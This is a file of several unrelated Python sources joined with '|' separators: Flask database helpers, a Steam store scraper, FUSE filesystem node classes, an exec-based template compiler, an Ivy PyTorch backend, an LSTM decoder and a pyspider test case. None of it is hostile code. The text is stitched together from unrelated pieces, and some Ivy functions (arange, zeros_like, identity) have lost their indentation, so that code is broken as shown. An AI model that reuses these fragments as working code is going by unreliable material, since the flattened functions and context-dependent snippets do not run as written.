def get_session():
    """Yield a scoped SQLAlchemy session bound to the app's DB connection,
    closing it on exit."""
    # Setup session with thread engine.
    # Allows for usage: with get_session() as session: session...
    # NOTE(review): get_db() returns a Connection (not an Engine); it is a
    # valid `bind` for sessionmaker, but the name below is misleading.
    engine = get_db()
    session = scoped_session(sessionmaker(bind=engine))
    try:
        yield session
    finally:
        session.close()
def close_db(e=None):
    """Teardown hook: close the per-context connection and dispose its engine.

    Args:
        e: unused; present to satisfy Flask's teardown-callback signature.
    """
    db = g.pop('db', None)
    engine = g.pop('engine', None)
    if db is not None:
        db.close()
    # Fixed: dispose the engine independently of the connection. Previously
    # `engine.dispose()` only ran when `db` existed — it crashed with
    # AttributeError when db was set but engine was not, and leaked the
    # engine when create_engine succeeded but connect() failed.
    if engine is not None:
        engine.dispose()
def init_db():
    """Create all tables declared on the models' ``Base`` metadata."""
    db = get_db()
    # `Base` comes from the star import of `models`.
    Base.metadata.create_all(db)
# CLI entry point: `flask init-db`.
@click.command('init-db')
@with_appcontext
def init_db_command():
    """Create tables from models.py"""
    init_db()
    click.echo('Initialized the database')
def init_app(app):
    """Register the DB teardown hook and the `init-db` CLI command."""
    app.teardown_appcontext(close_db)
    app.cli.add_command(init_db_command)
|
import sys
import json
import urllib.request
import time
print( "usage python .\\6removeoldscrape.py data.json outfile.json" )
# Steam storefront appdetails endpoint; the app id is appended per request.
url_start = "http://store.steampowered.com/api/appdetails?appids="
with open(sys.argv[1], 'r') as json_data:
    data = json.load(json_data)
# Iterate over a snapshot of the keys so entries can be removed mid-loop.
for item in list(data):
    appid = data[item]["appid"]
    print(appid)
    time.sleep(1)  # throttle requests to stay under the API rate limit
    # NOTE(review): assumes data[item]["appid"] is already a str — an int
    # would raise TypeError on concatenation; confirm the input schema.
    request = urllib.request.Request(url_start + appid)
    with urllib.request.urlopen(request) as response:
        url_data = response.read().decode("utf-8")
    # The API returns "null"/empty when throttled: back off and retry.
    while( url_data == "null" or url_data == "" ):
        time.sleep(60)
        request = urllib.request.Request(url_start + appid)
        with urllib.request.urlopen(request) as response:
            url_data = response.read().decode("utf-8")
        print( "retrying" )
    # Strip the outer {"<appid>": ...} wrapper by slicing between the first
    # ':' and the trailing '}' — leaves the inner per-app object.
    colon = url_data.find(':')
    url_data = url_data[colon+1:-1]
    json_data = json.loads(url_data)
    # Apps the store no longer knows about report success == False.
    if (json_data["success"] == False) :
        print("removed")
        data.pop(item)
with open(sys.argv[2], 'w') as outfile:
    json.dump(data, outfile, separators=(',', ':'))
import functools
import os
from io import BytesIO
from stat import S_IFDIR, S_IFLNK, S_IFREG
from typing import Dict, Iterable

import aiohttp

from .types import *
from .core import *
from . import types_conv
class BaseFile(Node):
    """Regular-file node base: stores permission bits, reports S_IFREG."""
    def __init__(self, mode: int = 0o444) -> None:
        # Keep only permission bits; the file-type bit is added in getattr().
        self.mode = mode & 0o777
    async def getattr(self) -> Stat:
        return Stat(
            st_mode=S_IFREG | self.mode
        )
class BaseDir(Node):
    """Directory node base: stores permission bits, reports S_IFDIR."""
    def __init__(self, mode: int = 0o555) -> None:
        # Keep only permission bits; the type bit is added in getattr().
        self.mode = mode & 0o777
    async def getattr(self) -> Stat:
        return Stat(
            st_mode=S_IFDIR | self.mode
        )
class BaseSymlink(Node):
    """Symlink node base: stores permission bits, reports S_IFLNK."""
    def __init__(self, mode: int = 0o444) -> None:
        # Keep only permission bits; the type bit is added in getattr().
        self.mode = mode & 0o777
    async def getattr(self) -> Stat:
        return Stat(
            st_mode=S_IFLNK | self.mode
        )
class Symlink(BaseSymlink):
    """Symlink with a fixed target string."""
    def __init__(self, link: str, mode: int = 0o444) -> None:
        super().__init__(mode)
        self.link = link
    async def readlink(self) -> str:
        return self.link
class BlobFile(BaseFile):
    """In-memory file backed by a bytes blob.

    All opens share one reference-counted handle, so concurrent users see
    the same buffer; the blob is persisted via save() when the last
    reference is released.
    """
    def __init__(self, data: bytes = b'', mode: int = None, rw: bool = False) -> None:
        # Default mode depends on writability when not given explicitly.
        super().__init__(mode if mode is not None else 0o666 if rw else 0o444)
        self.rw = rw
        self.data = data
        self.shared_handle = None  # lazily created, reference-counted

    async def load(self) -> bytes:
        """Return the current blob (override for other backing stores)."""
        return self.data

    async def save(self, data: bytes) -> None:
        """Persist the blob (override for other backing stores)."""
        self.data = data

    async def open(self, mode: int) -> FileHandle:
        # `mode` is intentionally ignored: write permission is enforced
        # per-operation via self.rw in the handle.
        if self.shared_handle is None:
            self.shared_handle = BlobFile.Handle(self, await self.load())
        self.shared_handle.refs += 1
        return self.shared_handle

    async def getattr(self) -> Stat:
        # Report the live buffer size while the file is open, otherwise the
        # persisted blob size.
        if self.shared_handle is not None:
            size = len(self.shared_handle.buffer.getvalue())
        else:
            size = len(self.data)
        return Stat(
            st_mode=S_IFREG | self.mode,
            st_size=size
        )

    async def truncate(self, size: int) -> None:
        # Route through open()/release() so the shared handle's refcount and
        # flush-on-last-release semantics are preserved.
        handle = await self.open(os.O_RDWR)
        try:
            await handle.truncate(size)
        finally:
            await handle.release()

    class Handle(FileHandle):
        """Shared, reference-counted handle over a BytesIO buffer."""
        def __init__(self, node: Node, data: bytes) -> None:
            super().__init__(node)
            self.buffer = BytesIO(data)
            self.dirty = False  # True once the buffer diverges from node.data
            self.refs = 0

        async def read(self, size: int, offset: int) -> bytes:
            self.buffer.seek(offset)
            return self.buffer.read(size)

        async def write(self, buffer, offset):
            if not self.node.rw:
                raise fuse.FuseOSError(errno.EPERM)
            self.dirty = True
            self.buffer.seek(offset)
            self.buffer.write(buffer)
            return len(buffer)

        async def truncate(self, size: int) -> None:
            if not self.node.rw:
                raise fuse.FuseOSError(errno.EPERM)
            self.dirty = True
            self.buffer.truncate(size)

        async def flush(self) -> None:
            if self.dirty:
                await self.node.save(self.buffer.getvalue())
            # Fixed: was `self.dirty = None` — keep the flag a proper bool.
            self.dirty = False

        async def release(self) -> None:
            self.refs -= 1
            if self.refs == 0:
                # Last reference: persist and drop the shared handle.
                await self.flush()
                self.node.shared_handle = None
class GeneratorFile(BaseFile):
    """File whose contents are produced lazily by a (possibly async)
    generator of bytes-like chunks; readable sequentially only."""
    def __init__(self, generator: Iterable[Bytes_Like], mode: int = 0o444, min_read_len: int = -1) -> None:
        super().__init__(mode)
        self.generator = generator
        # If > 0, read() may return early once this many bytes are gathered.
        self.min_read_len = min_read_len

    async def open(self, mode: int) -> FileHandle:
        # Each open gets its own handle and therefore its own iteration state.
        return GeneratorFile.Handle(self, self.generator, self.min_read_len)

    class Handle(FileHandle):
        def __init__(self, node: Node, generator: Iterable[Bytes_Like], min_read_len: int = -1) -> None:
            # direct_io/nonseekable: the size is unknown up front and data
            # can only be consumed in order.
            super().__init__(node, direct_io=True, nonseekable=True)
            self.generator = self.as_generator(generator)
            self.current_blob = b''          # chunk currently being consumed
            self.current_blob_position = 0   # read offset within current_blob
            self.min_read_len = min_read_len

        async def read(self, size: int, offset: int) -> bytes:
            # NOTE(review): `offset` is ignored — the handle is nonseekable,
            # so reads are assumed to arrive strictly in order.
            ret = b''
            while size > len(ret) and self.current_blob is not None:
                n = min(size - len(ret), len(self.current_blob) - self.current_blob_position)
                if n > 0:
                    ret += self.current_blob[self.current_blob_position : self.current_blob_position + n]
                    self.current_blob_position += n
                else:
                    # Current chunk exhausted: pull the next one (None = EOF).
                    try:
                        self.current_blob = types_conv.as_bytes(await self.generator.__anext__())
                    except StopAsyncIteration:
                        self.current_blob = None
                    self.current_blob_position = 0
                if self.min_read_len > 0 and len(ret) >= self.min_read_len:
                    break
            return ret

        def as_generator(self, generator):
            """Normalize an (async) iterator/iterable or a callable returning
            one into an async generator."""
            async def as_async_gen(data):
                for x in data:
                    yield x
            if hasattr(generator, '__anext__'):
                return generator
            elif hasattr(generator, '__aiter__'):
                return generator.__aiter__()
            elif hasattr(generator, '__next__'):
                return as_async_gen(generator)
            elif hasattr(generator, '__iter__'):
                return as_async_gen(iter(generator))
            elif callable(generator):
                # Callable: invoke it and normalize whatever it returns.
                return self.as_generator(generator())
            raise TypeError('Expected iterator, iterable, async iterator, async iterable or callable')
def generatorfile(func):
    """Decorator: turn a generator function into a factory returning a
    GeneratorFile node that lazily invokes it on open."""
    # Fixed: preserve the wrapped function's name/docstring for debugging.
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        return GeneratorFile(lambda: func(*args, **kwargs))
    return wrapper
class HttpFile(BaseFile):
    """Read-only file streaming the body of an HTTP GET of `url`."""
    def __init__(self, url: str, mode: int = 0o444) -> None:
        super().__init__(mode)
        self.url = url

    async def open(self, mode: int) -> FileHandle:
        # Enter the session/response context managers manually; they are
        # exited symmetrically in Handle.release().
        session = await aiohttp.ClientSession().__aenter__()
        response = await (await session.get(self.url)).__aenter__()
        return HttpFile.Handle(self, session, response)

    class Handle(FileHandle):
        def __init__(self, node: Node, session, response) -> None:
            super().__init__(node, direct_io=True, nonseekable=True)
            self.session = session
            self.response = response

        async def read(self, size: int, offset: int) -> bytes:
            # NOTE(review): `offset` is ignored — the body is consumed
            # sequentially (the handle is nonseekable).
            return await self.response.content.read(size)

        async def release(self) -> None:
            await self.response.__aexit__(None, None, None)
            await self.session.__aexit__(None, None, None)
class DictDir(BaseDir):
    """Directory backed by a name -> Node mapping; optionally writable."""
    def __init__(self, contents: Dict[str, Node_Like], mode: int = None, rw: bool = False) -> None:
        # Default mode depends on writability when not given explicitly.
        super().__init__(mode if mode is not None else 0o777 if rw else 0o555)
        self.rw = rw
        self.contents = contents

    # ====== RO operations ======
    async def lookup(self, name: str) -> Node_Like:
        return self.contents.get(name, None)

    async def opendir(self) -> DirHandle_Like:
        return DictDir.Handle(self, self.contents.keys())

    class Handle(DirHandle):
        def __init__(self, node: Node, items: Iterable[DirEntry]) -> None:
            super().__init__(node)
            self.items = items

        async def readdir(self) -> Iterable[DirEntry]:
            for item in self.items:
                yield item

    # ====== RW operations ======
    async def mknod(self, name: str, mode: int, dev: int) -> Node_Like:
        if not self.rw:
            raise fuse.FuseOSError(errno.EPERM)
        if dev != 0:
            # Device nodes are not supported.
            raise fuse.FuseOSError(errno.ENOSYS)
        new_file = BlobFile(b'', mode, rw=True)
        self.contents[name] = new_file
        return new_file

    async def mkdir(self, name: str, mode: int) -> Node_Like:
        if not self.rw:
            raise fuse.FuseOSError(errno.EPERM)
        new_dir = DictDir({}, mode, rw=True)
        self.contents[name] = new_dir
        return new_dir

    async def unlink(self, name: str) -> None:
        if not self.rw:
            raise fuse.FuseOSError(errno.EPERM)
        del self.contents[name]

    async def rmdir(self, name: str) -> None:
        if not self.rw:
            raise fuse.FuseOSError(errno.EPERM)
        del self.contents[name]

    async def symlink(self, name: str, target: str) -> Node_Like:
        if not self.rw:
            raise fuse.FuseOSError(errno.EPERM)
        new_link = Symlink(target)
        self.contents[name] = new_link
        # Fixed: return the created node, consistent with mknod/mkdir.
        return new_link

    async def rename(self, old_name: str, new_parent: Node, new_name: str) -> None:
        if not isinstance(new_parent, DictDir):
            raise fuse.FuseOSError(errno.ENOSYS)
        if not self.rw or not new_parent.rw:
            raise fuse.FuseOSError(errno.EPERM)
        # Fixed: the original referenced an undefined `name`, raising
        # NameError on every rename. Move old_name -> new_parent[new_name].
        node = self.contents[old_name]
        del self.contents[old_name]
        new_parent.contents[new_name] = node

    async def link(self, name: str, node: Node) -> Node_Like:
        # NOTE(review): unlike the other mutators, link() performs no rw
        # check — confirm whether linking into a read-only dir is intended.
        self.contents[name] = node
|
import re
# Demo template source: sections are delimited by '===<name>'; the {{...}}
# placeholders are left untouched by the compiler below.
texto ='''
===t1
<h1>{{v1}}</h1>
{{L1,T2}}
===T2
viva o Salgueiros
'''
def compilaTemplates(txt):
    """Compile '===name' template sections into module-level functions.

    Each section ``===name\\n<body>`` becomes a global function ``name(d)``
    that returns the body text verbatim.

    SECURITY NOTE: this exec()s code derived from the template text — only
    ever run it on trusted input.
    """
    # Fixed: split the `txt` parameter; the original ignored it and always
    # read the module-level global `texto`.
    sections = re.split(r'===', txt)
    # Discard the text before the first '===' marker; it is not a template.
    sections.pop(0)
    for section in sections:
        # Turn "name<body>" into "def name(d): return '''<body>''' ".
        code = re.sub(r'(\w+)(.+)', r"def \1(d): return '''\2''' ", section, flags=re.S)
        # Define the generated function at module scope.
        exec(code, globals())
# Compile the demo templates; defines t1/T2 at module scope via exec.
compilaTemplates(texto)
print(t1(7)) |
"""
Collection of PyTorch general functions, wrapped to fit Ivy syntax and signature.
"""
# global
import ivy
import numpy as np
torch_scatter = None
import math as _math
import torch as torch
from operator import mul
from torch.types import Number
from functools import reduce as _reduce
from typing import List, Dict, Optional, Union
# local
from ivy.functional.ivy import default_dtype
from ivy.functional.ivy.device import default_device
from ivy.functional.backends.torch.device import dev_from_str, _callable_dev
# API #
# ----#
def dtype_bits(dtype_in):
    """Return the bit width of a dtype; bool counts as 1 bit."""
    name = dtype_to_str(dtype_in)
    if 'bool' in name:
        return 1
    # Strip the prefix and type-family words, leaving only the bit count.
    for token in ('torch.', 'uint', 'int', 'bfloat', 'float'):
        name = name.replace(token, '')
    return int(name)
def shape(x, as_tensor=False) -> Union[torch.Tensor, List[int]]:
    """Return the shape of *x*, optionally wrapped in a tensor."""
    dims = x.shape
    if as_tensor:
        return torch.tensor(dims)
    return dims
def get_num_dims(x, as_tensor=False) -> Union[torch.Tensor, int]:
    """Number of dimensions of *x*, optionally wrapped in a tensor."""
    ndims = len(x.shape)
    if as_tensor:
        return torch.tensor(ndims)
    return ndims
def minimum(x, y):
    """Element-wise minimum; python scalars are promoted to tensors."""
    if isinstance(x, (int, float)):
        x = torch.tensor(x)
    if isinstance(y, (int, float)):
        y = torch.tensor(y)
    return torch.min(x, y)
def maximum(x, y):
    """Element-wise maximum; python scalars are promoted to tensors."""
    if isinstance(x, (int, float)):
        x = torch.tensor(x)
    if isinstance(y, (int, float)):
        y = torch.tensor(y)
    return torch.max(x, y)
def clip(x, x_min, x_max):
    """Clamp every element of *x* into [x_min, x_max]."""
    return torch.clamp(x, min=x_min, max=x_max)
def cast(x, dtype_in: str):
    """Cast tensor *x* to the dtype named by *dtype_in* (str or torch.dtype)."""
    target = dtype_from_str(dtype_in)
    return x.type(target)


# NumPy-style alias.
astype = cast
# noinspection PyShadowingNames
def arange(stop: Number, start: Number = 0, step: Number = 1, dtype: Optional[str] = None,
dev: Optional[str] = None):
dev = default_device(dev)
if dtype is not None:
return torch.arange(start, stop, step=step, dtype=dtype_from_str(dtype), device=dev_from_str(dev))
else:
return torch.arange(start, stop, step=step, device=dev_from_str(dev))
def concatenate(xs: List[torch.Tensor], axis: int = -1):
    """Concatenate tensors along *axis*; 0-d tensors are unsqueezed first."""
    if xs[0].shape != ():
        return torch.cat(xs, axis)
    # Scalars cannot be concatenated directly: promote each to shape (1,).
    return torch.cat([t.unsqueeze(0) for t in xs], axis)
def stack(xs: List[torch.Tensor], axis: int = 0):
    """Stack tensors along a new axis."""
    return torch.stack(xs, dim=axis)
def transpose(x, axes: List[int]):
    """Permute the dimensions of *x*; None reverses them (full transpose)."""
    if axes is None:
        axes = list(reversed(range(len(x.shape))))
    return x.permute(axes)
def where(condition, x1, x2):
    """Select from x1 where condition is truthy, else from x2."""
    # Coerce to bool so integer masks are accepted as conditions.
    return torch.where(condition.bool(), x1, x2)
def reshape(x, newshape: List[int]):
    """Reshape *x*; a bare int is treated as a single-dimension shape."""
    shape_list = [newshape] if isinstance(newshape, int) else newshape
    return torch.reshape(x, shape_list)
def broadcast_to(x, new_shape):
    """Broadcast *x* to `new_shape` via a non-copying expand (view)."""
    return x.expand(new_shape)
# noinspection PyShadowingNames
def zeros_like(x, dtype: Optional[str] = None, dev: Optional[str] = None):
if dev is None:
dev = _callable_dev(x)
if dtype is not None:
type_dict: Dict[str, torch.dtype] = {'int8': torch.int8,
'int16': torch.int16,
'int32': torch.int32,
'int64': torch.int64,
'uint8': torch.uint8,
'bfloat16': torch.bfloat16,
'float16': torch.float16,
'float32': torch.float32,
'float64': torch.float64,
'bool': torch.bool}
return torch.zeros_like(x, dtype=type_dict[dtype], device=dev_from_str(dev))
return torch.zeros_like(x, device=dev_from_str(dev))
def full(shape, fill_value, dtype=None, device=None):
    """Tensor of `shape` filled with `fill_value`; dtype inferred when None."""
    resolved_dtype = dtype_from_str(default_dtype(dtype, fill_value))
    return torch.full(
        ivy.shape_to_tuple(shape), fill_value, dtype=resolved_dtype,
        device=default_device(device))
def cross(x1, x2):
    """Cross product of corresponding 3-vectors in x1 and x2."""
    return torch.cross(x1, x2)
# noinspection PyShadowingNames
def identity(n: int, dtype: ivy.Dtype = 'float32', batch_shape: Optional[List[int]] = None,
dev: Optional[str] = None):
dev = default_device(dev)
type_dict: Dict[str, torch.dtype] = {'int8': torch.int8,
'int16': torch.int16,
'int32': torch.int32,
'int64': torch.int64,
'uint8': torch.uint8,
'bfloat16': torch.bfloat16,
'float16': torch.float16,
'float32': torch.float32,
'float64': torch.float64,
'bool': torch.bool}
dtype_val: torch.dtype = type_dict[dtype]
mat = torch.eye(n, n, dtype=dtype_val, device=dev_from_str(dev))
if batch_shape is None:
return mat
else:
reshape_dims = [1] * len(batch_shape) + [n, n]
tile_dims = list(batch_shape) + [1, 1]
res = torch.reshape(mat, reshape_dims).repeat(tile_dims)
return res
def meshgrid(*xs, indexing='ij'):
    """Coordinate grids for the given 1-D tensors ('ij' or 'xy' indexing)."""
    grids = torch.meshgrid(*xs)
    if indexing != 'xy':
        return grids
    # ToDo: verify if this is correct
    return tuple(torch.transpose(g, 1, 0) for g in grids)
def dtype(x, as_str=False):
    """Return the dtype of *x*, optionally as its canonical string name."""
    found = x.dtype
    if as_str:
        return dtype_to_str(found)
    return found
def dtype_to_str(dtype_in):
    """Canonical string name for a torch dtype; strings pass through."""
    if isinstance(dtype_in, str):
        return dtype_in
    names = {torch.int8: 'int8',
             torch.int16: 'int16',
             torch.int32: 'int32',
             torch.int64: 'int64',
             torch.uint8: 'uint8',
             torch.bfloat16: 'bfloat16',
             torch.float16: 'float16',
             torch.float32: 'float32',
             torch.float64: 'float64',
             torch.bool: 'bool'}
    return names[dtype_in]
def dtype_from_str(dtype_in: str) -> torch.dtype:
    """torch dtype for a canonical name; non-strings pass through."""
    if not isinstance(dtype_in, str):
        return dtype_in
    dtypes = {'int8': torch.int8,
              'int16': torch.int16,
              'int32': torch.int32,
              'int64': torch.int64,
              'uint8': torch.uint8,
              'bfloat16': torch.bfloat16,
              'float16': torch.float16,
              'float32': torch.float32,
              'float64': torch.float64,
              'bool': torch.bool}
    return dtypes[dtype_in]
def compile(fn, dynamic=True, example_inputs=None, static_argnums=None, static_argnames=None):
    """JIT-compile *fn*: torch.jit.script when dynamic, else trace.

    NOTE: shadows the builtin ``compile`` (existing public API of this
    backend). ``static_argnums``/``static_argnames`` are accepted for
    cross-backend signature parity but unused by torch.
    """
    if not dynamic:
        return torch.jit.trace(fn, example_inputs)
    return torch.jit.script(fn)
def current_framework_str():
    """Name of the backend framework implemented by this module."""
    return 'torch'
|
# Copyright (c) Facebook, Inc. and its affiliates.
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
class DecoderStep(nn.Module):
    """One LSTM decoding step followed by a linear projection."""

    def __init__(self, input_dim, output_dim, hidden_dim, lstm=None):
        super(DecoderStep, self).__init__()
        # Reuse a caller-supplied LSTM (e.g. shared with an encoder) when
        # given; otherwise build a fresh single-layer cell.
        if lstm:
            self.lstm = lstm
        else:
            self.lstm = nn.LSTM(input_size=input_dim, hidden_size=hidden_dim)
        self.out = nn.Linear(hidden_dim, output_dim)

    def forward(self, input, hidden=None, cell=None, encoder_outputs=None):
        """Run one step; returns (output, hidden, cell).

        `encoder_outputs` is accepted for interface parity with the
        attention variant and is unused here.
        """
        if hidden is None and cell is None:
            # Let the LSTM initialize its own zero state.
            output, (hidden, cell) = self.lstm(input)
        else:
            output, (hidden, cell) = self.lstm(input, (hidden, cell))
        projected = self.out(output.squeeze(0))
        return projected, hidden, cell
class LSTMDecoder(nn.Module):
    """Decoder to generate sequences using LSTM cells. Decoding is done in a
    greedy manner without attention mechanism.

    Attributes:
        input_dim: Size of input vector
        output_dim: Size of output to be generated at each time step
        hidden_dim: Size of hidden state vector
        device: Optional; Device to be used "cuda" or "cpu"
        lstm: Optional; If provided, the lstm cell will be used in the decoder.
            This is useful for sharing lstm parameters from encoder.
    """
    def __init__(
        self, input_dim, output_dim, hidden_dim, device="cuda", lstm=None
    ):
        super(LSTMDecoder, self).__init__()
        self.input_dim = input_dim
        self.decoder_step = DecoderStep(
            input_dim=input_dim,
            output_dim=output_dim,
            hidden_dim=hidden_dim,
            lstm=lstm,
        )
        self.device = device

    def forward(
        self,
        tgt,
        hidden=None,
        cell=None,
        max_len=None,
        teacher_forcing_ratio=0.5,
    ):
        """
        Inputs:
            tgt: Target sequence provided as input to the decoder. During
                training, provide reference target sequence. For inference,
                provide only last frame of source.
                Expected shape: (seq_len, batch_size, input_dim)
            hidden, cell: Hidden state and cell state to be used in LSTM cell
            max_len: Optional; Length of sequence to be generated. By default,
                the decoder generates sequence with same length as `tgt`
                (training).
            teacher_forcing_ratio: Probability of feeding gold target pose as
                decoder input instead of predicted pose from previous time step
        """
        # Incoming tgt is batch-first; convert to (seq, batch, dim).
        tgt = tgt.transpose(0, 1)
        max_len = max_len if max_len is not None else tgt.shape[0]
        batch_size = tgt.shape[1]
        input = tgt[0, :]
        # NOTE(review): the output buffer is sized with input_dim and
        # predictions are fed back as inputs below, so this decoder assumes
        # output_dim == input_dim — confirm for other configurations.
        outputs = torch.zeros(max_len, batch_size, self.input_dim,).to(
            self.device
        )
        for t in range(max_len):
            input = input.unsqueeze(0)
            output, hidden, cell = self.decoder_step(input, hidden, cell)
            outputs[t] = output
            # Coin flip per step: feed the gold frame or the prediction.
            # (Non-deterministic unless the RNG is seeded by the caller.)
            teacher_force = random.random() < teacher_forcing_ratio
            input = tgt[t] if teacher_force else output
        # Back to batch-first for the caller.
        outputs = outputs.transpose(0, 1)
        return outputs
class DecoderStepWithAttention(nn.Module):
    """One decoding step with attention over encoder outputs, followed by
    an LSTM cell and a linear projection."""
    def __init__(
        self, input_dim, output_dim, hidden_dim, source_length, device="cuda",
    ):
        super(DecoderStepWithAttention, self).__init__()
        self.input_dim = input_dim
        self.hidden_dim = hidden_dim
        self.output_dim = output_dim
        self.source_length = source_length
        self.device = device
        # Scores over source positions, computed from [input; hidden].
        self.attn = nn.Linear(
            self.hidden_dim + self.input_dim, self.source_length,
        )
        # Mixes the input with the attended context back to input_dim.
        self.attn_combine = nn.Linear(
            self.hidden_dim + self.input_dim, self.input_dim,
        )
        self.lstm = nn.LSTM(input_size=input_dim, hidden_size=hidden_dim)
        self.out = nn.Linear(self.hidden_dim, self.output_dim)

    def forward(self, input, hidden, cell, encoder_outputs):
        # NOTE(review): `hidden` is used for scoring here, yet the branch
        # below still allows hidden/cell to be None — a None hidden would
        # fail at this cat(); confirm how callers invoke the first step.
        attn_weights = F.softmax(
            self.attn(torch.cat((input, hidden), 2)), dim=2,
        )
        # Weighted sum of encoder outputs (batch-first bmm).
        attn_applied = torch.bmm(attn_weights.transpose(0, 1), encoder_outputs)
        output = torch.cat((input, attn_applied.transpose(0, 1)), 2)
        output = self.attn_combine(output)
        output = F.relu(output)
        if (hidden is None) and (cell is None):
            output, (hidden, cell) = self.lstm(output)
        else:
            output, (hidden, cell) = self.lstm(output, (hidden, cell))
        output = output.squeeze(0)
        output = self.out(output)
        return output, hidden, cell
class LSTMDecoderWithAttention(LSTMDecoder):
    def __init__(
        self,
        input_dim,
        output_dim,
        max_source_length,
        hidden_dim=128,
        device="cuda",
    ):
        """Extension of LSTMDecoder that uses attention mechanism to generate
        sequences.

        Attributes:
            input_dim: Size of input vector
            output_dim: Size of output to be generated at each time step
            max_source_length: Length of source sequence
            hidden_dim: Size of hidden state vector
            device: Optional; Device to be used "cuda" or "cpu"
        """
        super(LSTMDecoderWithAttention, self).__init__(
            input_dim, output_dim, hidden_dim, device
        )
        # Replace the parent's plain DecoderStep with the attention variant;
        # the inherited forward() loop is reused as-is.
        self.decoder_step = DecoderStepWithAttention(
            input_dim, output_dim, hidden_dim, max_source_length
        )
        self.device = device
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-22 14:00:05
import os
import copy
import time
import unittest2 as unittest
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.libs import utils
from pyspider.processor.project_module import ProjectManager
class TestProjectModule(unittest.TestCase):
    """Exercise a project module built by ProjectManager.build_module against
    canned task/fetch fixtures (callback implementations live in
    data_handler.py).

    NOTE(review): `base_task` / `fetch_result` are class attributes mutated
    by individual tests (callback name, status code), so the tests are
    order-sensitive — hence the numeric prefixes in the method names.
    """
    # Template task; each test overwrites process.callback before running.
    base_task = {
        'taskid': 'taskid',
        'project': 'test.project',
        'url': 'www.baidu.com/',
        'schedule': {
            'priority': 1,
            'retries': 3,
            'exetime': 0,
            'age': 3600,
            'itag': 'itag',
            'recrawl': 5,
        },
        'fetch': {
            'method': 'GET',
            'headers': {
                'Cookie': 'a=b',
            },
            'data': 'a=b&c=d',
            'timeout': 60,
            'save': [1, 2, 3],
        },
        'process': {
            'callback': 'callback',
        },
    }
    # Canned successful fetch handed to the processor alongside base_task.
    fetch_result = {
        'status_code': 200,
        'orig_url': 'www.baidu.com/',
        'url': 'http://www.baidu.com/',
        'headers': {
            'cookie': 'abc',
        },
        'content': 'test data',
        'cookies': {
            'a': 'b',
        },
        'save': [1, 2, 3],
    }

    def setUp(self):
        """Build the scripted project module fresh for every test."""
        self.project = "test.project"
        # NOTE(review): the file handle from open() is never closed here.
        self.script = open(os.path.join(os.path.dirname(__file__), 'data_handler.py')).read()
        self.env = {
            'test': True,
        }
        self.project_info = {
            'name': self.project,
            'status': 'DEBUG',
        }
        data = ProjectManager.build_module({
            'name': self.project,
            'script': self.script
        }, {'test': True})
        self.module = data['module']
        self.instance = data['instance']

    def test_2_hello(self):
        self.base_task['process']['callback'] = 'hello'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception)
        self.assertEqual(ret.result, "hello world!")

    def test_3_echo(self):
        self.base_task['process']['callback'] = 'echo'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception)
        self.assertEqual(ret.result, "test data")

    def test_4_saved(self):
        self.base_task['process']['callback'] = 'saved'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception)
        self.assertEqual(ret.result, self.base_task['fetch']['save'])

    def test_5_echo_task(self):
        self.base_task['process']['callback'] = 'echo_task'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception)
        self.assertEqual(ret.result, self.project)

    def test_6_catch_status_code(self):
        # Temporarily fake a 403 fetch, then restore 200 for later tests.
        self.fetch_result['status_code'] = 403
        self.base_task['process']['callback'] = 'catch_status_code'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception)
        self.assertEqual(ret.result, 403)
        self.fetch_result['status_code'] = 200

    def test_7_raise_exception(self):
        self.base_task['process']['callback'] = 'raise_exception'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNotNone(ret.exception)
        # The callback logs at all three levels before raising.
        logstr = ret.logstr()
        self.assertIn('info', logstr)
        self.assertIn('warning', logstr)
        self.assertIn('error', logstr)

    def test_8_add_task(self):
        self.base_task['process']['callback'] = 'add_task'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
        self.assertIsNone(ret.exception, ret.logstr())
        self.assertEqual(len(ret.follows), 1)
        self.assertEqual(len(ret.messages), 1)

    def test_10_cronjob(self):
        # The _on_cronjob dispatcher should trigger callbacks whose
        # configured interval divides the provided tick.
        task = {
            'taskid': '_on_cronjob',
            'project': self.project,
            'url': 'data:,_on_cronjob',
            'fetch': {
                'save': {
                    'tick': 11,
                },
            },
            'process': {
                'callback': '_on_cronjob',
            },
        }
        fetch_result = copy.deepcopy(self.fetch_result)
        fetch_result['save'] = {
            'tick': 11,
        }
        # tick=11: neither cronjob fires.
        ret = self.instance.run_task(self.module, task, fetch_result)
        logstr = ret.logstr()
        self.assertNotIn('on_cronjob1', logstr)
        self.assertNotIn('on_cronjob2', logstr)
        # tick=10: only cronjob2 fires.
        task['fetch']['save']['tick'] = 10
        fetch_result['save'] = task['fetch']['save']
        ret = self.instance.run_task(self.module, task, fetch_result)
        logstr = ret.logstr()
        self.assertNotIn('on_cronjob1', logstr)
        self.assertIn('on_cronjob2', logstr)
        # tick=60: both fire.
        task['fetch']['save']['tick'] = 60
        fetch_result['save'] = task['fetch']['save']
        ret = self.instance.run_task(self.module, task, fetch_result)
        logstr = ret.logstr()
        self.assertIn('on_cronjob1', logstr)
        self.assertIn('on_cronjob2', logstr)

    def test_20_get_info(self):
        # _on_get_info should follow up with the requested info keys.
        task = {
            'taskid': '_on_get_info',
            'project': self.project,
            'url': 'data:,_on_get_info',
            'fetch': {
                'save': ['min_tick', ],
            },
            'process': {
                'callback': '_on_get_info',
            },
        }
        fetch_result = copy.deepcopy(self.fetch_result)
        fetch_result['save'] = task['fetch']['save']
        ret = self.instance.run_task(self.module, task, fetch_result)
        self.assertEqual(len(ret.follows), 1, ret.logstr())
        for each in ret.follows:
            self.assertEqual(each['url'], 'data:,on_get_info')
            self.assertEqual(each['fetch']['save']['min_tick'], 10)

    def test_30_generator(self):
        self.base_task['process']['callback'] = 'generator'
        ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
